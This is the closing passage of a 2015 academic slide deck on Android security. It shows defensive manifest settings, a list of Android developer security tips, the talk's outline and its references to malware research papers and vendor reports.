    mark android:exported=false
    android:protectionLevel=signature
    Bob (CUHK) Android Security November 2, 2015 101 / 107

    View Slide

  102. Security Tips from developer.android.com [2]
    Storing Data
    Using permissions
    requesting permissions
    creating permissions
    Using networking
    Using IP networking
    Using telephony networking
    Performing input validation
    Handling user data
    Using WebView
    Using cryptography
    Using IPC
    Dynamically loading code
    Security in a VM
    Security in native code
    Bob (CUHK) Android Security November 2, 2015 102 / 107

    View Slide

  103. Conclusion I
    1 Introduction
    2 Background
    How to Build an Android Application?
    Application Fundamentals
    APK File Structure
    Android Architecture
    Android Platform Security Architecture
    Distribution Methods of Apps
    3 Attacks
    Android Malware
    Malware Distribution
    Vulnerabilities of Android OS
    Android Apps Security
    4 Analysis Tools
    Bob (CUHK) Android Security November 2, 2015 103 / 107

    View Slide

  104. Conclusion II
    Tools in Android SDK
    Static Analysis
    Dynamic Analysis
    Online Analysis
    5 Defense
    Obfuscation
    Android NDK
    Security Tips
    6 Conclusion
    Bob (CUHK) Android Security November 2, 2015 104 / 107

    View Slide

  105. References I
    Qihoo 360. http://blogs.360.cn/360mobile/2014/01/17/oldboot-the-
    first-bootkit-on-android/.
    Android. http://developer.android.com/training/articles/security-
    tips.html.
    William Enck, Peter Gilbert, Byung-Gon Chun, Landon P Cox, Jaeyeon Jung,
    Patrick McDaniel, and Anmol Sheth. “TaintDroid: An Information-Flow Tracking
    System for Realtime Privacy Monitoring on Smartphones.” In: OSDI. Vol. 10. 2010,
    pp. 1–6.
    Adrienne Porter Felt, Helen J Wang, Alexander Moshchuk, Steve Hanna, and
    Erika Chin. “Permission Re-Delegation: Attacks and Defenses.” In: USENIX Security
    Symposium. 2011.
    Jim Huang. Android IPC Mechanism.
    http://www.slideshare.net/jserv/android-ipc-mechanism.
    Bob (CUHK) Android Security November 2, 2015 105 / 107

    View Slide

  106. References II
    Jim Huang. Understanding the Dalvik Virtual Machine.
    http://www.slideshare.net/jserv/understanding-the-dalvik-
    virtual-machine.
    Activity Lifecycle. Activity Lifecycle. http://docs.xamarin.com/guides/android/
    application_fundamentals/activity_lifecycle/.
    Lookout. Mobile Threats, Made to Measure. https://www.lookout.com/static/
    ee_images/Mobile_Threats_Made_to_Measure_Lookout_Report_2013.pdf.
    Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, and Heng Yin. “Attacks on WebView
    in the Android system”. In: Proceedings of the 27th Annual Computer Security
    Applications Conference. ACM. 2011, pp. 343–352.
    C. Enrique Ortiz. Understanding security on Android.
    http://www.ibm.com/developerworks/library/x-androidsecurity/.
    Slashdot. http://beta.slashdot.org/submission/3273305/security-
    researcher-found-the-first-android-bootkit-in-the-wild.
    Bob (CUHK) Android Security November 2, 2015 106 / 107

    View Slide

  107. References III
    Symantec. Mobile Adware and Malware Analysis.
    http://www.symantec.com/content/en/us/enterprise/media/security_
    response/whitepapers/madware_and_malware_analysis.pdf.
    Claud Xiao. “Android Apps Security in Practice”. In: xKungfu. 2013.
    Veo Zhang. Trojanized Flappy Bird Comes on the Heels of Takedown by App Creator.
    http://blog.trendmicro.com/trendlabs-security-
    intelligence/trojanized-flappy-bird-comes-on-the-heels-of-
    takedown-by-app-creator/.
    Yajin Zhou and Xuxian Jiang. “Dissecting android malware: Characterization and
    evolution”. In: Security and Privacy (SP), 2012 IEEE Symposium on. IEEE. 2012,
    pp. 95–109.
    Bob (CUHK) Android Security November 2, 2015 107 / 107

    View Slide